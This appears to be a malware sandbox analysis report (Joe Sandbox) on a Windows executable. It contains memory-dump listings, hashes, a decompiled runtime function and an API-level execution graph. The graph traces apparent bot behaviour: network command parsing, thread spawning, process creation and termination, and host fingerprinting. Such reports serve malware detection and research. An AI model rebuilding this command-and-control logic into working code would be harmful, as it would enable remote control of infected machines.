                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: CreateErrorLastMutex
                                                                          • String ID: k_fbpxf5nna
                                                                          • API String ID: 1925916568-3032876681
                                                                          • Opcode ID: 9a88b48d1ad107bc964547b3910128f81a6eaee6bb5813ff57ad5a3f8fd565ef
                                                                          • Instruction ID: b44495afc4b5e1c155c3d7f26a4bf6281c5b98a28f183e2cb1f81a9367dbc24a
                                                                          • Opcode Fuzzy Hash: 9a88b48d1ad107bc964547b3910128f81a6eaee6bb5813ff57ad5a3f8fd565ef
                                                                          • Instruction Fuzzy Hash: 17E04FB0418308DAC700BF71C1C664DBEE4AB80348F40893EE888622C2C778958C8727
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: CreateErrorLastMutex
                                                                          • String ID: IHYanFuibyan
                                                                          • API String ID: 1925916568-2233043627
                                                                          • Opcode ID: 4d0d80ee3a61e30fea3e63c13358dfb84c2fbac065cd1307cf50ef5234048b85
                                                                          • Instruction ID: b226eb3715ba9fc3d7238d88576273fb4163caaa6f42e8cd02b01324a8811274
                                                                          • Opcode Fuzzy Hash: 4d0d80ee3a61e30fea3e63c13358dfb84c2fbac065cd1307cf50ef5234048b85
                                                                          • Instruction Fuzzy Hash: 30E04FB0408308DACB00BF71C1C564DBEE4AB40388F40853EE888622C2C778954C8727
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 28%
                                                                          			E0040B460(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, int _a4) {
                                                                          				intOrPtr _v8;
                                                                          				intOrPtr _v12;
                                                                          				intOrPtr _v16;
                                                                          				int _v24;
                                                                          				void* _t20;
                                                                          				long _t24;
                                                                          				void* _t25;
                                                                          				int _t28;
                                                                          				intOrPtr _t38;
                                                                          				int _t40;
                                                                          				intOrPtr* _t49;
                                                                          				long* _t50;
                                                                          
                                                                          				_t43 = __esi;
                                                                          				_t32 = __ebx;
                                                                          				_v8 = __edi;
                                                                          				_t40 = _a4;
                                                                          				_v16 = __ebx;
                                                                          				_v12 = __esi;
                                                                          				_t38 =  *0x418284;
                                                                          				if(_t38 == 0) {
                                                                          					E0040B0E0(_t20);
                                                                          					_t38 =  *0x418284;
                                                                          					if( *((intOrPtr*)(_t38 + 0x30)) >= 0) {
                                                                          						goto L2;
                                                                          					} else {
                                                                          						goto L7;
                                                                          					}
                                                                          				} else {
                                                                          					if( *((intOrPtr*)(_t38 + 0x30)) < 0) {
                                                                          						L7:
                                                                          						E0040B3B0(_t32, _t43);
                                                                          						_t38 =  *0x418284;
                                                                          						if( *((intOrPtr*)(_t38 + 0x30)) == 0) {
                                                                          							goto L3;
                                                                          						} else {
                                                                          							goto L9;
                                                                          						}
                                                                          					} else {
                                                                          						L2:
                                                                          						if( *((intOrPtr*)(_t38 + 0x30)) != 0) {
                                                                          							L9:
                                                                          							_t24 = GetLastError();
                                                                          							 *_t49 =  *((intOrPtr*)(_t38 + 0x2c));
                                                                          							_t25 = TlsGetValue(??);
                                                                          							_t50 = _t49 - 4;
                                                                          							 *_t50 = _t24;
                                                                          							SetLastError(??);
                                                                          							 *_t40 = _t25;
                                                                          							_v24 = _t40;
                                                                          							 *((intOrPtr*)(_t50 - 4)) =  *((intOrPtr*)( *0x418284 + 0x2c));
                                                                          							_t28 = TlsSetValue(??, ??);
                                                                          							if(_t28 == 0) {
                                                                          								goto __ecx;
                                                                          							}
                                                                          						} else {
                                                                          							L3:
                                                                          							_t28 =  *(_t38 + 0x28);
                                                                          							 *_t40 = _t28;
                                                                          							 *(_t38 + 0x28) = _t40;
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				return _t28;
                                                                          			}















                                                                          0x0040b460
                                                                          0x0040b460
                                                                          0x0040b466
                                                                          0x0040b469
                                                                          0x0040b46c
                                                                          0x0040b46f
                                                                          0x0040b472
                                                                          0x0040b47a
                                                                          0x0040b4a0
                                                                          0x0040b4a5
                                                                          0x0040b4b0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040b47c
                                                                          0x0040b481
                                                                          0x0040b4c0
                                                                          0x0040b4c0
                                                                          0x0040b4c5
                                                                          0x0040b4d0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040b483
                                                                          0x0040b483
                                                                          0x0040b488
                                                                          0x0040b4e0
                                                                          0x0040b4e3
                                                                          0x0040b4e9
                                                                          0x0040b4ee
                                                                          0x0040b4f4
                                                                          0x0040b4f9
                                                                          0x0040b4fc
                                                                          0x0040b502
                                                                          0x0040b50f
                                                                          0x0040b513
                                                                          0x0040b516
                                                                          0x0040b521
                                                                          0x0040b539
                                                                          0x0040b539
                                                                          0x0040b48a
                                                                          0x0040b48a
                                                                          0x0040b48a
                                                                          0x0040b48d
                                                                          0x0040b48f
                                                                          0x0040b48f
                                                                          0x0040b488
                                                                          0x0040b481
                                                                          0x0040b49e

                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,00405F1A), ref: 0040B4E3
                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,00405F1A), ref: 0040B4EE
                                                                          • SetLastError.KERNEL32(?,?,?,?,?,?,00405F1A), ref: 0040B4FC
                                                                          • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,00405F1A), ref: 0040B516
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastValue
                                                                          • String ID:
                                                                          • API String ID: 1151882462-0
                                                                          • Opcode ID: 16660377808b608b832b0cbaea9d7365e9406ce6128743baf1b4238b0422be3c
                                                                          • Instruction ID: 439973a8ce157f22f3a963889ba98c70b340b09c43d7307190215458f466d12f
                                                                          • Opcode Fuzzy Hash: 16660377808b608b832b0cbaea9d7365e9406ce6128743baf1b4238b0422be3c
                                                                          • Instruction Fuzzy Hash: 8B210375A0060A9FCB40DF69DA8469ABBF4FF48310F1081AADC44A7352E734BE51CBC9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • lstrcat.KERNEL32 ref: 00402B31
                                                                            • Part of subcall function 00404EAE: GetTickCount.KERNEL32 ref: 00404EB8
                                                                            • Part of subcall function 00404EAE: srand.MSVCRT ref: 00404EC0
                                                                            • Part of subcall function 00404EAE: rand.MSVCRT ref: 00404EC5
                                                                          • lstrcat.KERNEL32 ref: 00402B59
                                                                          • lstrcat.KERNEL32 ref: 00402B81
                                                                          • Sleep.KERNEL32 ref: 00402EC5
                                                                          • lstrcat.KERNEL32 ref: 00402BA3
                                                                            • Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
                                                                            • Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
                                                                            • Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcat$ConnectedCountHandleInternetLibraryLoadModuleSleepStateTickrandsrand
                                                                          • String ID:
                                                                          • API String ID: 1562643418-0
                                                                          • Opcode ID: 2c7b681fe86cc2fd1af3aa736b3d656723dcda11dd27d62708b8b77b6b1c1b4c
                                                                          • Instruction ID: 03b09b6922a9c514b299c22ddce90b04ecaf30bc7003352be57799a9fe594460
                                                                          • Opcode Fuzzy Hash: 2c7b681fe86cc2fd1af3aa736b3d656723dcda11dd27d62708b8b77b6b1c1b4c
                                                                          • Instruction Fuzzy Hash: C121FCB59143148BCB10EF64D9816DEBBF4BB84314F40857FE584A3281EB389698CF96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • lstrcat.KERNEL32 ref: 0040294A
                                                                            • Part of subcall function 00404EAE: GetTickCount.KERNEL32 ref: 00404EB8
                                                                            • Part of subcall function 00404EAE: srand.MSVCRT ref: 00404EC0
                                                                            • Part of subcall function 00404EAE: rand.MSVCRT ref: 00404EC5
                                                                          • lstrcat.KERNEL32 ref: 00402972
                                                                          • lstrcat.KERNEL32 ref: 0040299A
                                                                          • Sleep.KERNEL32 ref: 00402EC5
                                                                          • lstrcat.KERNEL32 ref: 004029BC
                                                                            • Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
                                                                            • Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
                                                                            • Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcat$ConnectedCountHandleInternetLibraryLoadModuleSleepStateTickrandsrand
                                                                          • String ID:
                                                                          • API String ID: 1562643418-0
                                                                          • Opcode ID: a53f60471630b529b5b3fa49e027026b6c5687552c409762689948fa5b30f580
                                                                          • Instruction ID: 058901da40b0e2efb01319e0cab41814326d79342e400853ca70bd999cd91e9a
                                                                          • Opcode Fuzzy Hash: a53f60471630b529b5b3fa49e027026b6c5687552c409762689948fa5b30f580
                                                                          • Instruction Fuzzy Hash: AE21EE759143148BC710EF64D98169EBBF4FB84314F00897FE5C5A3241EB389698CF96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • lstrcat.KERNEL32 ref: 00402D33
                                                                          • lstrcat.KERNEL32 ref: 00402D4D
                                                                            • Part of subcall function 00404EAE: GetTickCount.KERNEL32 ref: 00404EB8
                                                                            • Part of subcall function 00404EAE: srand.MSVCRT ref: 00404EC0
                                                                            • Part of subcall function 00404EAE: rand.MSVCRT ref: 00404EC5
                                                                          • lstrcat.KERNEL32 ref: 00402D75
                                                                          • Sleep.KERNEL32 ref: 00402EC5
                                                                          • lstrcat.KERNEL32 ref: 00402D97
                                                                            • Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
                                                                            • Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
                                                                            • Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcat$ConnectedCountHandleInternetLibraryLoadModuleSleepStateTickrandsrand
                                                                          • String ID:
                                                                          • API String ID: 1562643418-0
                                                                          • Opcode ID: a5e0d163f18fc207e3c7efa7da69fe8f01bfacc653d33c2322edad23d5ce2f0b
                                                                          • Instruction ID: c94e486dd441945c80f89e6855cf6e362e59878be9d52d1e169f04df5a17e1bb
                                                                          • Opcode Fuzzy Hash: a5e0d163f18fc207e3c7efa7da69fe8f01bfacc653d33c2322edad23d5ce2f0b
                                                                          • Instruction Fuzzy Hash: 8521ECB69143148BCB10EF64D9816DEBBF4BB84314F40857FE589A3241EB349698CF96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • lstrcat.KERNEL32 ref: 00402871
                                                                          • lstrcat.KERNEL32 ref: 0040288B
                                                                            • Part of subcall function 00404EAE: GetTickCount.KERNEL32 ref: 00404EB8
                                                                            • Part of subcall function 00404EAE: srand.MSVCRT ref: 00404EC0
                                                                            • Part of subcall function 00404EAE: rand.MSVCRT ref: 00404EC5
                                                                          • lstrcat.KERNEL32 ref: 004028B3
                                                                          • Sleep.KERNEL32 ref: 00402EC5
                                                                          • lstrcat.KERNEL32 ref: 004028D5
                                                                            • Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
                                                                            • Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
                                                                            • Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcat$ConnectedCountHandleInternetLibraryLoadModuleSleepStateTickrandsrand
                                                                          • String ID:
                                                                          • API String ID: 1562643418-0
                                                                          • Opcode ID: 55e289c392c43dc11c6b29da9f1cba6e1b33f9d9a4985b1c99fcb906303650f7
                                                                          • Instruction ID: a2a94c62469e04ea526b3170561a4d1959144f6524308fe89c3ba5c1d6912741
                                                                          • Opcode Fuzzy Hash: 55e289c392c43dc11c6b29da9f1cba6e1b33f9d9a4985b1c99fcb906303650f7
                                                                          • Instruction Fuzzy Hash: 2F21ED769043048BC710EF64D9815CEBBF4FB84314F40857FE985A3241EB349698CF96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Execution Graph

                                                                          Execution Coverage:16.6%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:1421
                                                                          Total number of Limit Nodes:25
                                                                          execution_graph 4909 40a4c0 4910 40a4f8 4909->4910 4912 40a4d3 4909->4912 4911 40a3d0 66 API calls 4910->4911 4911->4912 4913 40b460 18 API calls 4912->4913 4916 40a7c8 4913->4916 4914 40a820 ??3@YAXPAX 4915 40a82b 4914->4915 4918 40b540 15 API calls 4915->4918 4916->4914 4917 40a7ed 4916->4917 4919 40c080 3 API calls 4916->4919 4917->4915 4921 40c0e0 2 API calls 4917->4921 4920 40a836 4918->4920 4919->4917 4922 40a81a 4921->4922 4922->4914 4922->4915 5490 40b9c0 5494 40b9db 5490->5494 5491 40b0e0 10 API calls 5491->5494 5492 40ba60 GetLastError TlsGetValue SetLastError 5492->5494 5493 40b3b0 4 API calls 5493->5494 5494->5491 5494->5492 5494->5493 5495 40baac 5494->5495 5496 40babc 5495->5496 5498 40b0e0 10 API calls 5495->5498 5497 40bac3 5496->5497 5501 40b3b0 4 API calls 5496->5501 5499 40baca 5497->5499 5500 40bade TlsSetValue 5497->5500 5498->5496 5500->5499 5502 40baf5 GetLastError 5500->5502 5501->5497 5502->5499 5503 40bfc0 GetLastError TlsGetValue SetLastError 5154 409f42 5155 409f50 5154->5155 5158 409f00 5155->5158 5159 4094a0 strcmp 5158->5159 5160 409f1c 5159->5160 5161 40bf42 5162 40bf50 TlsAlloc 5161->5162 5163 40bf80 GetLastError 5162->5163 5164 40bf63 5162->5164 5165 407144 memset memset _mbscat 5237 405362 5165->5237 5172 40735f TerminateThread 5172->5172 5177 407342 5172->5177 5173 40739f TerminateThread 5173->5173 5173->5177 5174 404f0a 3 API calls 5174->5177 5175 4073c4 Sleep 5175->5177 5176 405434 6 API calls 5176->5177 5177->5172 5177->5173 5177->5174 5177->5175 5177->5176 5178 407424 send 5177->5178 5179 4073fb Sleep 5177->5179 5217 407c13 closesocket Sleep 5177->5217 5235 407bc7 CreateThread 5177->5235 5180 407473 recv 5178->5180 5179->5177 5187 407412 5180->5187 5181 407c3e 5182 4074de strtok 5183 4074ff strtok 5182->5183 5183->5183 5184 407520 lstrcmp 5183->5184 5185 407541 atoi atoi 5184->5185 5186 4076ae lstrcmp 5184->5186 5189 4075b1 atoi 5185->5189 5190 407586 lstrcmp 5185->5190 5188 407711 lstrcmp 5186->5188 5204 407655 5186->5204 5187->5180 5187->5181 5187->5182 5193 40777e lstrcmp 5188->5193 5194 40772e 5188->5194 5195 4075f0 lstrcmp 5189->5195 5196 40761b atoi 5189->5196 5190->5189 5191 4075a0 atoi 5190->5191 5191->5189 5198 4077e2 lstrcmp 5193->5198 5199 40779b CreateThread 5193->5199 5194->5193 5197 407743 CreateThread 5194->5197 5195->5196 5200 40760a atoi 5195->5200 5201 40762a lstrcmp 5196->5201 5196->5204 5197->5193 5202 407803 memset 5198->5202 5203 4078ed lstrcmp 5198->5203 5199->5198 5200->5196 5201->5204 5205 407644 atoi 5201->5205 5206 407837 5202->5206 5208 40790a atoi 5203->5208 5209 40792e lstrcmp 5203->5209 5204->5186 5207 407662 CreateThread 5204->5207 5212 4048e2 4 API calls 5204->5212 5205->5204 5216 40784d memset CreateProcessA 5206->5216 5207->5186 5207->5207 5211 40791c 5208->5211 5210 4079c5 lstrcmp 5209->5210 5228 40794b 5209->5228 5213 407a28 lstrcmp 5210->5213 5222 4079e2 5210->5222 5253 404ca6 5211->5253 5212->5188 5215 407a8b lstrcmp 5213->5215 5224 407a45 5213->5224 5215->5217 5218 407aac atoi atoi 5215->5218 5246 404d3a CreateToolhelp32Snapshot Process32First 5216->5246 5217->5177 5220 407b13 atoi 5218->5220 5221 407ae5 lstrcmp 5218->5221 5229 407b52 lstrcmp 5220->5229 5230 407b7d atoi 5220->5230 5221->5220 5225 407b02 atoi 5221->5225 5227 4048e2 4 API calls 5222->5227 5223 404690 5 API calls 5223->5228 5233 4048e2 4 API calls 5224->5233 5225->5220 5227->5213 5228->5223 5236 404690 5 API calls 5228->5236 5229->5230 5231 407b6c atoi 5229->5231 5230->5177 5232 407b8c lstrcmp 5230->5232 5231->5230 5232->5177 5234 407ba9 atoi 5232->5234 5233->5215 5234->5177 5235->5217 5235->5235 5236->5210 5238 405387 5237->5238 5239 404748 4 API calls 5238->5239 5240 4053b7 _mbscat 5239->5240 5241 405316 gethostname gethostbyname 5240->5241 5242 405347 inet_ntoa 5241->5242 5243 40535b _mbscat 5241->5243 5242->5243 5244 405256 GetVersionExA 5243->5244 5245 405283 _mbscat _mbscat _mbscat 5244->5245 5245->5177 5247 404d85 5246->5247 5248 404dec 5246->5248 5249 404d8b strcmp 5247->5249 5248->5203 5250 404dd3 Process32Next 5249->5250 5251 404d9b OpenProcess 5249->5251 5250->5248 5250->5249 5251->5250 5252 404dc0 TerminateProcess 5251->5252 5252->5250 5254 404cc6 5253->5254 5255 4048e2 4 API calls 5254->5255 5256 404cdd 5255->5256 5256->5209 4271 406a48 4278 404eae GetTickCount srand rand 4271->4278 4273 406abd wsprintfA 4274 406b2e 4273->4274 4276 406b95 4274->4276 4277 406b4d send closesocket Sleep 4274->4277 4279 405434 WSASocketA 4274->4279 4277->4274 4278->4273 4280 4054e9 4279->4280 4281 40547e htons 4279->4281 4280->4274 4284 4053c2 gethostbyname 4281->4284 4285 4053f3 4284->4285 4286 4053e5 inet_addr 4284->4286 4287 405428 WSAConnect 4285->4287 4288 40540c memcpy 4285->4288 4286->4285 4287->4280 4288->4287 4923 4092c9 4924 4092d0 4923->4924 4925 40b540 15 API calls 4924->4925 4926 4092db 4925->4926 5257 401149 5258 401150 SetUnhandledExceptionFilter 5257->5258 5259 40116b 5258->5259 5260 401170 __getmainargs 5259->5260 5261 401210 __p__fmode 5260->5261 5262 4011ac 5260->5262 5261->5262 5262->5261 5263 401260 _setmode 5262->5263 5264 4011c4 _setmode 5262->5264 5265 4011e8 _setmode 5262->5265 5266 40122a __p__environ 5262->5266 5263->5262 5264->5262 5265->5261 5267 404076 265 API calls 5266->5267 5268 40124b _cexit ExitProcess 5267->5268 5268->5263 5504 4029c9 lstrcat 5515 404eae GetTickCount srand rand 5504->5515 5506 4029f1 lstrcat 5516 404eae GetTickCount srand rand 5506->5516 5508 402a19 lstrcat lstrcat lstrcat 5509 402ecd 5508->5509 5510 404f0a 3 API calls 5509->5510 5511 402ed6 